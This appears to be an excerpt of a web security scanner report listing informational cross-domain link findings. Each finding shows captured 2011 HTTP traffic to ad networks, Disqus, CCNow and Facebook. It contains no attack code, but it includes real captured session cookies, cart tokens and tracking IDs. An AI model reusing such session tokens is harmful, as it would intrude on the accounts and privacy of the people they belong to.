Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: icu=ChII-sEBEAoYCiAKKAowg_iG7gQQg_iG7gQYCQ..; sess=1; uuid2=2724386019227846218; anj=Kfw)(CZ#-r-98m2jrr-%SN'CJQE2F!)VKr0:$5r$<o/e@)WesS%k+n*I('YxYT*<N@6F+c(io$N-%L1@9'b[5(:jB-9V[OUYy9.R5e[ytcpQ`bMH@TW6X$3_sCR$6Xedk-G'TDF.mC`)B_N$6LQR^Q1gg.MkA)P$tfA)DWsB'hbJ<Zo?BY+A8^^2)oHZ5mIqhtj<v4iwpkyYITX547eLID>>z*PI7v'je[t@sbTLvZL[5/^@u)U'+YE]A*I/WjMFL7TH)6(3+$CLIE.`Q02p!/Bh8LJdJMOI#teJcaJ2gAxMkoDkRfC>:upDX3r@Xk!*_O@<)?o7FEG#?s@>3rsZ:NP+SZwInEb8?uR<<.1bW>zC'DHc(RjR_5cV/>hV4<.Ep_Brg%LYIKnl%jfU4H4E7-mJZW+LULZ/rSrz3JC#MNpp09cPRI)3/W$VKQg4AB[7:`laDI'0.])0*DP]MTFF+TEc'nRbjb[T9R5j$WfUnk:l:dTEaTSKXEV/XvsO=)MPZ#H-A8'm1SbZ-hlwo/uIEE1WKi>%cMg!FYc3gk*_!.KhjIbfv>n6icJz]`pNnloA:BN7K@E`FgYF*-qn0v`vWZ1n

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Tue, 10-May-2011 13:59:40 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=2724386019227846218; path=/; expires=Sun, 07-Aug-2011 13:59:40 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=2724386019227846218; path=/; expires=Sun, 07-Aug-2011 13:59:40 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: icu=ChII-YMBEAoYASABKAEwzOaf7gQQzOaf7gQYAA..; path=/; expires=Sun, 07-Aug-2011 13:59:40 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=2724386019227846218; path=/; expires=Sun, 07-Aug-2011 13:59:40 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: anj=Kfw)(CZ%E]*wn6#L)u[/9vF(#Y0hCyOq4zX.]@%YeDfOm%>H*7YB.%bEM]y->w8KvAo2=dOe[sU:l.T_/[NYl(2Eh>8Xvm?rd_r=>@v12n1PPr83x.yt9kLh`*HT%BGdWyHjK6f0cX7I[xMnk2l%9TDEFPbl>j#IWjYmS?2Slf#n2GlZ?NtukNevrCBvNv$/LeQb#NWY6#p?5Iu_J$i)=dJF%'fnWsjMXB<Asu#1y3xlChN'hH`mL%?2OPWu4C5'7Q:h(JfD(sdhR.k05YkrZhE:rjV(mIlaW+!0co/_ZL*i)<k1)OMwY=fQs2/?WvG99-nO6Z+uf@aoxi@q`Kpcu'mnyC_.Lkbk-f#OOUe<q.80]f[@i1ga+uzgRuJ$'bbRz!=-@wnl$(Rx5Htg)4_GEmX>8j%0wr@pc*n6nSnSFrzhz/1Vt7obj(Fj#<8xba6Nf94EPZmt6turO7C<00`E$Kx1gBKW-'n(.0)'[-r%'(8>+t=kBU92d^_ZgS'^q6A:q-s]UkdZGZ9<vX!u1FsK@GgtGyJHdlIU:WFV/!Z_7='J9^-KvkXh*lzRgL33)!PQ!odnpnaw$jg1t]wZM+J$n!lhf)z]`%I4TZ`kCG1; path=/; expires=Sun, 07-Aug-2011 13:59:40 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/javascript
Date: Mon, 09 May 2011 13:59:40 GMT
Content-Length: 618

document.write('<scr'+'ipt type="text/javascript"src="http://ad.doubleclick.net/adj/cm.tribune/uscell_ldev_300x600_05311;net=cm;u=,cm-87971011_1304949578,11f8f328940989e,ent,ax.-cm.ent_l-cm.music_h-ti
...[SNIP]...
</scr'+'ipt>');document.write('<img src="http://view.atdmt.com/ADO/view/278612728/direct;wi.1;hi.1/01" width="1" height="1"/>');

15.29. http://imp.fetchback.com/serve/fb/imp

Summary

Severity:   Information
Confidence:   Certain
Host:   http://imp.fetchback.com
Path:   /serve/fb/imp

Issue detail

The page was loaded from a URL containing a query string. The response contains the following links to other domains:

Request

GET /serve/fb/imp?tid=59534&type=lead&clicktrack=http://optimized-by.rubiconproject.com/t/7858/13549/26630-2.3200913.3219970?url= HTTP/1.1
Host: imp.fetchback.com
Proxy-Connection: keep-alive
Referer: http://www.nme.com/news/sufjan-stevens/56527
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uat=1_1304506950; cmp=1_1304903354_13521:0_11051:0_13981:208292_13479:208292_15758:367625_12704:367625_4895:795810_10164:1160086_10638:1160086_10640:1160086_10641:1160086_1437:1160086_1660:1723682; sit=1_1304903354_3006:489:0_3455:208292:208292_2988:430572:396401_3801:543015:542595_1714:827548:795810_3306:1055174:367625_719:1160913:1160086_2451:1211782:1206682_3236:1369745:1369627_782:1724031:1723682; bpd=1_1304903354_1ZunS:78_1ZCU5:4QUb; apd=1_1304903354_1ZunS:6O; afl=1_1304903354; cre=1_1304949669_29807:59535:1:0_29802:59536:1:588698_29805:59534:1:589359; kwd=1_1304949669_12936:254607_11317:1206401_11717:1206401_11718:1206401_11719:1206401; scg=1_1304949669; ppd=1_1304949669; uid=1_1304949672_1303179323923:6792170478871670

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 14:01:14 GMT
Server: Apache/2.2.3 (CentOS)
Set-Cookie: cre=1_1304949674_29805:59534:2:0_29807:59535:1:5_29802:59536:1:588703; Domain=.fetchback.com; Expires=Sat, 07-May-2016 14:01:14 GMT; Path=/
Set-Cookie: uid=1_1304949674_1303179323923:6792170478871670; Domain=.fetchback.com; Expires=Sat, 07-May-2016 14:01:14 GMT; Path=/
Set-Cookie: kwd=1_1304949674_12936:254612_11317:1206406_11717:1206406_11718:1206406_11719:1206406; Domain=.fetchback.com; Expires=Sat, 07-May-2016 14:01:14 GMT; Path=/
Set-Cookie: scg=1_1304949674; Domain=.fetchback.com; Expires=Sat, 07-May-2016 14:01:14 GMT; Path=/
Set-Cookie: ppd=1_1304949674; Domain=.fetchback.com; Expires=Sat, 07-May-2016 14:01:14 GMT; Path=/
Cache-Control: max-age=0, no-store, must-revalidate, no-cache
Expires: Mon, 09 May 2011 14:01:14 GMT
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 10433

<style type="text/css">body {margin: 0px; padding: 0px;}</style>
<a href="http://imp.fetchback.com/serve/fb/overlay?8945eae51d9a2c8e4a5ff0a7577d8283a6c350af96ce36b3985a1944046ffd99d3a4259f239ce6c8683e
...[SNIP]...
<div id="myAlternativeContent">
           <a href="http://www.adobe.com/go/getflashplayer">
               <img src="http://www.adobe.com/images/shared/download_buttons/get_flash_player.gif" alt="Get Adobe Flash player" />
           </a>
...[SNIP]...

15.30. http://media.adfrontiers.com/pq

Summary

Severity:   Information
Confidence:   Certain
Host:   http://media.adfrontiers.com
Path:   /pq

Issue detail

The page was loaded from a URL containing a query string. The response contains the following links to other domains:

Request

GET /pq?t=f&s=923&ts=1304949604772&cm=1148&ac=5&at=1&xvk=60302672.07185271&fd=t&tc=1&rr=t HTTP/1.1
Host: media.adfrontiers.com
Proxy-Connection: keep-alive
Referer: http://www.floridatoday.com/article/20110508/NEWS01/105080319/Highly-publicized-murder-Caylee-Anthony-rivets-enrages
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: tc=1; af="3|!RglRcjj3oVAzGl,hfn!gk!!77,-1066|3142|618|1|1304340985980|26|3|0:349|2477|618|1|1304340397914|26|3|0:349|1148|1484|1|1304949604776|25|2|0:-"

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Cache-Control: private, no-cache, no-store, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Expires: Mon, 01 Jan 2000 00:00:00 GMT
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Set-Cookie: af="3|!RglRcjj3oVAzGl,hfn!gk!!77,-1066|3142|618|1|1304340985980|26|3|0:349|2477|618|1|1304340397914|26|3|0:349|1148|1484|1|1304949604776|25|2|0:-"; Version=1; Domain=media.adfrontiers.com; Max-Age=2592000; Path=/
Content-Type: text/html
Content-Length: 771
Date: Mon, 09 May 2011 14:00:09 GMT
Connection: close

<html><head>
<title>Adv.com 2010 - FCap 3/24 728x90</title>
</head><body marginwidth=0 marginheight=0 leftmargin=0 topmargin=0 style="background-color:transparent">
<script type='text/javascript'>
v
...[SNIP]...
</script>
<script type='text/javascript' SRC='http://uac.advertising.com/wrapper/aceUAC.js'></script>

<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...
<noscript>
<a href="http://www.quantcast.com/p-eb7mHCSsqWKbY" target="_blank"><img src="http://pixel.quantserve.com/pixel/p-eb7mHCSsqWKbY.gif" style="display: none" border="0" height="1"

width="1" alt="Quantcast"/>
</a>
...[SNIP]...

15.31. http://mediacdn.disqus.com/1304703476/build/system/disqus.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://mediacdn.disqus.com
Path:   /1304703476/build/system/disqus.js

Issue detail

The page was loaded from a URL containing a query string. The response contains the following link to another domain:

Request

GET /1304703476/build/system/disqus.js? HTTP/1.1
Host: mediacdn.disqus.com
Proxy-Connection: keep-alive
Referer: http://www.clashmusic.com/news/sufjan-stevens-suffered-nervous-breakdown
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-487374334-1303349183888; sessionid=5439c19bf65868637b6d94bd5708f992; __utmz=113869458.1304526991.8.8.utmcsr=news.techworld.com|utmccn=(referral)|utmcmd=referral|utmcct=/personal-tech/3277379/x-factor-contestants-warned-after-250000-data-breach/; __utma=113869458.1602204697.1303349184.1304359650.1304526991.8

Response

HTTP/1.1 200 OK
Server: Apache/2.2.14 (Ubuntu)
Last-Modified: Sat, 07 May 2011 00:13:15 GMT
P3P: CP="DSP IDC CUR ADM DELi STP NAV COM UNI INT PHY DEM"
Content-Type: application/javascript
Vary: Accept-Encoding
X-Varnish: 2794956330 2794955461
Cache-Control: max-age=2371001
Expires: Mon, 06 Jun 2011 00:37:40 GMT
Date: Mon, 09 May 2011 14:00:59 GMT
Connection: close
Content-Length: 188344

DISQUS.dtpl=(function(){var b={version:"0.2",author:"Anton Kovalyov <anton@disqus.com>"};b.getGuestFields=function(g){function f(h){return DISQUS.nodes.get("#"+h+(g?"-"+g:""))}return{name:f("dsq-field
...[SNIP]...
<span class="dsq-mention dsq-tt dsq-mention-twitter"original-title="Expand @'+w+'\'s profile" data-dsq-username="'+w+'" data-dsq-remote="twitter"><a class="twitter-account" href="http://twitter.com/'+w+'" onclick="window.open(\''+u+"', 'Twitter Mention', 'height=420, width=550');return false;\">@"+w+"</a>
...[SNIP]...

15.32. http://mf.sitescout.com/disp

Summary

Severity:   Information
Confidence:   Certain
Host:   http://mf.sitescout.com
Path:   /disp

Issue detail

The page was loaded from a URL containing a query string. The response contains the following links to other domains:

Request

GET /disp?pid=0C66F16&cm=http%3A%2F%2Fib.adnxs.com%2Fclick%2FXHLcKR2syT9cctwpHazJPwAAACAEVvI_XHLcKR2syT9cctwpHazJP0YIgIiop3FfSsYda6b2ziWz88dNAAAAAAc4BgBmAQAAZgEAAAIAAACj0gIA8WoAAAEAAABVU0QAVVNEANgCWgD-AQAAmA8AAQMCAAUAAAAANyNUQgAAAAA.%2Fcnd%3D%21Wx_b0wjC6AIQo6ULGAAg8dUBKAAxXXLcKR2syT9CEwgAEAAYACABKP7__________wFCCwiCOxAAGAAgAigBQgsIgzsQABgAIAIoAUIOCMg-ELG5AhihEyACKAVCCwitZBAAGAAgAigBSANQAFj-A2AEaOYC%2Freferrer%3Dhttp%253A%252F%252Fwww.thevine.com.au%2Fclickenc%3D&rand=75602591 HTTP/1.1
Host: mf.sitescout.com
Proxy-Connection: keep-alive
Referer: http://ib.adnxs.com/if?enc=XHLcKR2syT9cctwpHazJPwAAACAEVvI_XHLcKR2syT9cctwpHazJP0YIgIiop3FfSsYda6b2ziWz88dNAAAAAAc4BgBmAQAAZgEAAAIAAACj0gIA8WoAAAEAAABVU0QAVVNEANgCWgD-AQAAmA8AAgMCAAUAAAAAOCNlQgAAAAA.&udj=uf%28%27a%27%2C+577%2C+1304949676%29%3Buf%28%27r%27%2C+184995%2C+1304949676%29%3B&cnd=!Wx_b0wjC6AIQo6ULGAAg8dUBKAAxXXLcKR2syT9CEwgAEAAYACABKP7__________wFCCwiCOxAAGAAgAigBQgsIgzsQABgAIAIoAUIOCMg-ELG5AhihEyACKAVCCwitZBAAGAAgAigBSANQAFj-A2AEaOYC&referrer=http://www.thevine.com.au
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Cache-Control: max-age=0,no-cache,no-store
Pragma: no-cache
Expires: Tue, 11 Oct 1977 12:34:56 GMT
SAdBuild: 400
P3P: CP="NON DEVa PSAa PSDa OUR NOR NAV",policyref="/w3c/p3p.xml"
Content-Type: text/html
Content-Length: 6515
Date: Mon, 09 May 2011 14:01:29 GMT

<html>

<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<meta http-equiv="Expires" content="Tue, 01 Jan 2000 12:12:12 GMT">

...[SNIP]...
<span class="tadShadow">
<img src="http://mediaforce.sitescout.netdna-cdn.com/ad150-c157549.jpg" alt="SHOCKING: $9 Car Insurance in TX"/>
   </span>
...[SNIP]...
<span class="tadShadow">
<img src="http://mediaforce.sitescout.netdna-cdn.com/ad211-8e8041f.jpg" alt="New Policy in Texas"/>
   </span>
...[SNIP]...

15.33. http://tag.contextweb.com/TagPublish/getad.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tag.contextweb.com
Path:   /TagPublish/getad.aspx

Issue detail

The page was loaded from a URL containing a query string. The response contains the following link to another domain:

Request

GET /TagPublish/getad.aspx?tagver=1&ca=VIEWAD&cp=536156&ct=101378&cf=728X90&cn=1&rq=1&dw=1066&cwu=http%3A%2F%2Fwww.floridatoday.com%2Farticle%2F20110508%2FNEWS01%2F105080319%2FHighly-publicized-murder-Caylee-Anthony-rivets-enrages&mrnd=74482871&if=0&tl=1&pxy=0,0&cxy=1050,3575&dxy=1050,3575&tz=300&ln=en-US HTTP/1.1
Host: tag.contextweb.com
Proxy-Connection: keep-alive
Referer: http://www.floridatoday.com/article/20110508/NEWS01/105080319/Highly-publicized-murder-Caylee-Anthony-rivets-enrages
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: C2W4=3bZ_cGKSaikCutesUynzUXb59QbtOHa7Nv35a38qe_dW_2SdvoXWHsQ; pb_rtb_ev=1:535495.0c2aede6-6bb6-11e0-8fe6-0025900a8ffe.1|530739.4dab7d35-b1d2-915a-d3c0-9d57f9c66b07.0|535039.9QQxcTO5uH2Ia7Bk4vGS2S96ufOGsSDC.0|535461.2931142961646634775.1; cr=2|1|-8588966416881931568|1; FC1-WC=^53620_1_2QLwy; V=wOebwAz4UvVv; cwbh1=541%3B05%2F24%2F2011%3BLIFL1%0A1697%3B05%2F24%2F2011%3BFCRT1%0A2354%3B05%2F24%2F2011%3BZETC1%0A2532%3B05%2F26%2F2011%3BAMQU2%0A1443%3B05%2F30%2F2011%3BNETM7%0A2250%3B06%2F06%2F2011%3BEXPD1; cw=cw

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT"
X-Powered-By: ASP.NET
CW-Server: CW-WEB23
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: application/x-javascript; charset=utf-8
Content-Length: 2555
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT"
Date: Mon, 09 May 2011 14:00:02 GMT
Connection: close
Set-Cookie: V=wOebwAz4UvVv; domain=.contextweb.com; expires=Wed, 09-May-2012 14:00:02 GMT; path=/
Set-Cookie: 536156_4_101378=1304949602182; domain=.contextweb.com; path=/
Set-Cookie: cr=2|1|-8588966416881931568|1%0a15|1|-8588960524833886248|1; domain=.contextweb.com; expires=Thu, 03-May-2012 14:00:02 GMT; path=/
Set-Cookie: vf=1; domain=.contextweb.com; expires=Tue, 10-May-2011 04:00:00 GMT; path=/

var strCreative=''
+ '<script src="http://tag.admeld.com/passback/js/610/gannett/728x90/8/meld.js"></scr'+'ipt>\n'
;
document.write(strCreative);var strCreative=''
+ '<iframe src="http://bh.context
...[SNIP]...

15.34. http://www.ccnow.com/cgi-local/cart.cgi

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ccnow.com
Path:   /cgi-local/cart.cgi

Issue detail

The page was loaded from a URL containing a query string. The response contains the following link to another domain:

Request

GET /cgi-local/cart.cgi?2akrshop2_AKR074VINYL HTTP/1.1
Host: www.ccnow.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1304949980.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.1027269073.1304949980.1304949980.1304949980.1; __utmc=1; __utmb=1.5.10.1304949980; oudelay=1304950305; ccnowcart=ENC010DEC12F02A8FAE3CA5C242A1F216FB75444E983624DD85F34467139B51A38206;

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 14:12:25 GMT
Server: Apache/1.3.42 (Unix) mod_fastcgi/2.4.6
Set-Cookie: oudelay=1304950348; domain=www.ccnow.com; path=/; expires=Mon, 09-May-2011 15:12:28 GMT
Set-Cookie: ccnowcart=ENC010DEC12F02A8FAE3CA5C242A1F216FB75AC132BC7478C7307DEBD3D97FA4A6E72CA22BF32FAF94F13; domain=www.ccnow.com; path=/; expires=Wed, 08-May-2013 14:12:28 GMT
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 19792

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<title>Shopping cart Experts - CCNow Online Credit Card Processing and Merchant Acc
...[SNIP]...
<!-- -->
<script src="http://www.google-analytics.com/ga.js" type="text/javascript"></script>
...[SNIP]...

15.35. http://www.ccnow.com/cgi-local/sc_cart.cgi

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ccnow.com
Path:   /cgi-local/sc_cart.cgi

Issue detail

The page was loaded from a URL containing a query string. The response contains the following link to another domain:

Request

GET /cgi-local/sc_cart.cgi?8147444662139294 HTTP/1.1
Host: www.ccnow.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ccnowcart=ENC010DEC12F02A8FAE3CA5C242A1F216FB7568A8E92F8CE5F45B4467139B51A38206

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 14:07:30 GMT
Server: Apache/1.3.42 (Unix) mod_fastcgi/2.4.6
Set-Cookie: oudelay=1304950050; domain=www.ccnow.com; path=/; expires=Mon, 09-May-2011 15:07:30 GMT
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 15270

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<title>Shopping cart Experts - CCNow Online Credit Card Processing and Merchant Acc
...[SNIP]...
<!-- -->
<script src="http://www.google-analytics.com/ga.js" type="text/javascript"></script>
...[SNIP]...

15.36. http://www.facebook.com/plugins/comments.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/comments.php

Issue detail

The page was loaded from a URL containing a query string. The response contains the following links to other domains:

Request

GET /plugins/comments.php?api_key=158577044196953&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df6000e528%26origin%3Dhttp%253A%252F%252Fwww.nme.com%252Ff272cfc8b4%26relation%3Dparent.parent%26transport%3Dpostmessage&href=http%3A%2F%2Fwww.nme.com%2Fnews%2Fsufjan-stevens%2F56527&locale=en_GB&numposts=10&sdk=joey&width=620 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.nme.com/news/sufjan-stevens/56527
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; datr=ituyTcnawc6q7VcE0gibPCo2

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.32.124.129
X-Cnection: close
Date: Mon, 09 May 2011 14:01:17 GMT
Content-Length: 102275

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
</title>
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yD/r/rZiaNe7iEDZ.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yX/r/AZ23fTP8PUp.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/y6/r/D97gxsfJDCQ.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yj/r/qdjc8Os7vL6.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/y5/r/Z6PtFE_aVAz.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/y1/r/kKOeJEnwuz7.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yQ/r/9qdm_pQmTM3.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/y3/r/4wOZW9c83Yr.css" />

<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/yV/r/ecpCmrvFebs.js"></script>
...[SNIP]...
<a class="viewerProfileHref" onclick="return false;" target="_blank" href="#"><img class="uiProfilePhoto viewerProfilePic uiProfilePhotoLarge img" src="http://profile.ak.fbcdn.net/static-ak/rsrc.php/v1/yo/r/UlIqmHJn-SK.gif" /></a>
...[SNIP]...
<span style="padding-left: 21px;" class="uiIconLink"><img class="img" src="http://static.ak.fbcdn.net/rsrc.php/v1/yw/r/RmIID-GA1c2.png" style="top: -1px;" width="16" height="16" />Yahoo</span>
...[SNIP]...
<span style="padding-left: 21px;" class="uiIconLink"><img class="img" src="http://static.ak.fbcdn.net/rsrc.php/v1/yo/r/VangFCcwoLx.png" style="top: -1px;" width="16" height="16" />AOL</span>
...[SNIP]...
<span style="padding-left: 21px;" class="uiIconLink"><img class="img" src="http://static.ak.fbcdn.net/rsrc.php/v1/yT/r/Q0crEbz3ZUz.png" style="top: -1px;" width="16" height="16" />Hotmail</span>
...[SNIP]...
</div><img class="throbber img" src="http://static.ak.fbcdn.net/rsrc.php/v1/yb/r/GsNJNwuI-UM.gif" width="16" height="11" /><div class="postToProfile hidden_elem">
...[SNIP]...
<a class="UIImageBlock_Image UIImageBlock_ENT_Image" href="http://www.facebook.com/profile.php?id=645172076" target="_blank" tabindex="-1"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/211513_645172076_2713688_q.jpg" /></a>
...[SNIP]...
</a> .. <a class="uiLinkSubtle" href="http://www.nme.com/news/sufjan-stevens/56527?fb_comment_id=fbc_10150196646559441_16603935_10150196684414441" target="_blank" onmousedown="UntrustedLink.bootstrap($(this), &quot;282ea&quot;, event, bagof(null));" rel="nofollow"><abbr title="Sunday, 08 May 2011 at 04:53" data-date="Sun, 08 May 2011 04:53:47 -0700">
...[SNIP]...
<input type="hidden" autocomplete="off" name="command" value="reply" /><img class="uiProfilePhoto viewerProfilePic uiProfilePhotoLarge img" src="http://profile.ak.fbcdn.net/static-ak/rsrc.php/v1/yo/r/UlIqmHJn-SK.gif" /><div class="replywrapper">
...[SNIP]...
<span style="padding-left: 21px;" class="uiIconLink"><img class="img" src="http://static.ak.fbcdn.net/rsrc.php/v1/yw/r/RmIID-GA1c2.png" style="top: -1px;" width="16" height="16" />Yahoo</span>
...[SNIP]...
<span style="padding-left: 21px;" class="uiIconLink"><img class="img" src="http://static.ak.fbcdn.net/rsrc.php/v1/yo/r/VangFCcwoLx.png" style="top: -1px;" width="16" height="16" />AOL</span>
...[SNIP]...
<span style="padding-left: 21px;" class="uiIconLink"><img class="img" src="http://static.ak.fbcdn.net/rsrc.php/v1/yT/r/Q0crEbz3ZUz.png" style="top: -1px;" width="16" height="16" />Hotmail</span>
...[SNIP]...
<a class="UIImageBlock_Image UIImageBlock_ENT_Image" href="#" target="_blank" tabindex="-1"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/211657_1048765383_8301852_q.jpg" /></a>
...[SNIP]...
</a> .. <a class="uiLinkSubtle" href="http://www.nme.com/news/sufjan-stevens/56527?fb_comment_id=fbc_10150196646559441_16607287_10150196862769441" target="_blank" onmousedown="UntrustedLink.bootstrap($(this), &quot;282ea&quot;, event, bagof(null));" rel="nofollow"><abbr title="Sunday, 08 May 2011 at 09:02" data-date="Sun, 08 May 2011 09:02:22 -0700" class="timestamp">
...[SNIP]...
<input type="hidden" autocomplete="off" name="command" value="reply" /><img class="uiProfilePhoto viewerProfilePic uiProfilePhotoLarge img" src="http://profile.ak.fbcdn.net/static-ak/rsrc.php/v1/yo/r/UlIqmHJn-SK.gif" /><div class="replywrapper">
...[SNIP]...
<span style="padding-left: 21px;" class="uiIconLink"><img class="img" src="http://static.ak.fbcdn.net/rsrc.php/v1/yw/r/RmIID-GA1c2.png" style="top: -1px;" width="16" height="16" />Yahoo</span>
...[SNIP]...
<span style="padding-left: 21px;" class="uiIconLink"><img class="img" src="http://static.ak.fbcdn.net/rsrc.php/v1/yo/r/VangFCcwoLx.png" style="top: -1px;" width="16" height="16" />AOL</span>
...[SNIP]...
<span style="padding-left: 21px;" class="uiIconLink"><img class="img" src="http://static.ak.fbcdn.net/rsrc.php/v1/yT/r/Q0crEbz3ZUz.png" style="top: -1px;" width="16" height="16" />Hotmail</span>
...[SNIP]...
